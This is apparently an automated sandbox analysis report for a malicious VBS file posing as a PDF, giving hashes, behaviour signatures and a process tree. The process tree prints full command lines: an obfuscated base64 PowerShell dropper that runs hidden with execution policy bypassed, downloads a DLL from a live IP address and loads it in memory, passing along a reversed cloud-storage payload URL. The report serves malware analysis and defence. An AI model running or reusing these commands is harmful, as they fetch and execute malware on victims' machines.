Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    30-12-2024 03:13

General

  • Target

    RFAU02GSHKOPSFDQW_002_PDF.vbs

  • Size

    222KB

  • MD5

    f212536d8cdf98f7284837ee48886346

  • SHA1

    7fe473d02fe0dc783b6021c792abca338dc4e11f

  • SHA256

    91f8e59475196b2ab33f9e5e22beb04d3ee039985abe1572a4a6e7b3f6f8b74d

  • SHA512

    08524a86d5b9f53953e9587286e7210c48ee403e99c67f13dbdd5081a7d558c58541c4e95b6ca640a98a5e5d8a634127801767655b168fa8889357d3319880c6

  • SSDEEP

    192:Oply3gSajcsbpS1zQ1QXDebjDqNBft1hx8+W6h8VDvwAv1CjIc:ODokghw1HqR98dfH1Cjj

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
    yes
  • URLs (ps1.dropper)
    http://20.106.255.48/dll/TESTING.txt

Signatures

  • Blocklisted process makes network request (1 IoC)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)

    Runs PowerShell with the display window hidden.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFAU02GSHKOPSFDQW_002_PDF.vbs"
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DI❤M❤❤u❤DE❤M❤❤2❤C4❤Mg❤1❤DU❤Lg❤0❤Dg❤LwBk❤Gw❤b❤❤v❤FQ❤RQBT❤FQ❤SQBO❤Ec❤LgB0❤Hg❤d❤❤n❤Ck❤KQ❤7❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBB❤H❤❤c❤BE❤G8❤bQBh❤Gk❤bgBd❤Do❤OgBD❤HU❤cgBy❤GU❤bgB0❤EQ❤bwBt❤GE❤aQBu❤C4❤T❤Bv❤GE❤Z❤❤o❤CQ❤R❤BM❤Ew❤KQ❤u❤Ec❤ZQB0❤FQ❤eQBw❤GU❤K❤❤n❤EY❤aQBi❤GU❤cg❤u❤Eg❤bwBt❤GU❤Jw❤p❤C4❤RwBl❤HQ❤TQBl❤HQ❤a❤Bv❤GQ❤K❤❤n❤FY❤QQBJ❤Cc❤KQ❤u❤Ek❤bgB2❤G8❤awBl❤Cg❤J❤Bu❤HU❤b❤Bs❤Cw❤I❤Bb❤G8❤YgBq❤GU❤YwB0❤Fs❤XQBd❤C❤❤K❤❤n❤DU❤Mg❤1❤Dk❤M❤Bl❤GI❤Yg❤w❤DI❤NQ❤0❤C0❤O❤❤z❤Dc❤OQ❤t❤DQ❤Yg❤1❤DQ❤LQBi❤Dc❤ZgBl❤C0❤Mw❤x❤GI❤YwBh❤GY❤N❤❤2❤D0❤bgBl❤Gs❤bwB0❤CY❤YQBp❤GQ❤ZQBt❤D0❤d❤Bs❤GE❤PwB0❤Hg❤d❤❤u❤D❤❤MgBB❤FI❤RQ❤v❤G8❤LwBt❤G8❤Yw❤u❤HQ❤bwBw❤HM❤c❤Bw❤GE❤Lg❤w❤Dc❤N❤Bm❤GY❤LQBz❤HI❤LwBi❤C8❤M❤B2❤C8❤bQBv❤GM❤LgBz❤Gk❤c❤Bh❤GU❤b❤Bn❤G8❤bwBn❤C4❤ZQBn❤GE❤cgBv❤HQ❤cwBl❤HM❤YQBi❤GU❤cgBp❤GY❤Lw❤v❤Do❤cwBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/TESTING.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('52590ebb0254-8379-4b54-b7fe-31bcaf46=nekot&aidem=tla?txt.02ARE/o/moc.topsppa.074ff-sr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2688


Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: da8d6c12fda9263b710142c3543e0bc4
    SHA1: 7ea98f73b3c61168f468aabf6ab6f07701d99a16
    SHA256: b2ffc0d596d560c3b5f0ec599992f7b7f31d98ce54240f0948088b2b2688b76f
    SHA512: 85d221597c18c7198a0a37fa1d9efa3f3b20ee3f19c82e52c341132d1beff1198f0a89080e054790f733a5a77c4e5e9afcadbf984f032e2f5e19700f45e37956

  • memory/2696-4-0x000007FEF605E000-0x000007FEF605F000-memory.dmp (Filesize: 4KB)
  • memory/2696-5-0x000000001B730000-0x000000001BA12000-memory.dmp (Filesize: 2.9MB)
  • memory/2696-6-0x0000000001EE0000-0x0000000001EE8000-memory.dmp (Filesize: 32KB)
  • memory/2696-7-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp (Filesize: 9.6MB)
  • memory/2696-8-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp (Filesize: 9.6MB)
  • memory/2696-9-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp (Filesize: 9.6MB)
  • memory/2696-10-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp (Filesize: 9.6MB)
  • memory/2696-16-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp (Filesize: 9.6MB)
  • memory/2696-17-0x000007FEF605E000-0x000007FEF605F000-memory.dmp (Filesize: 4KB)
  • memory/2696-18-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp (Filesize: 9.6MB)
  • memory/2696-19-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp (Filesize: 9.6MB)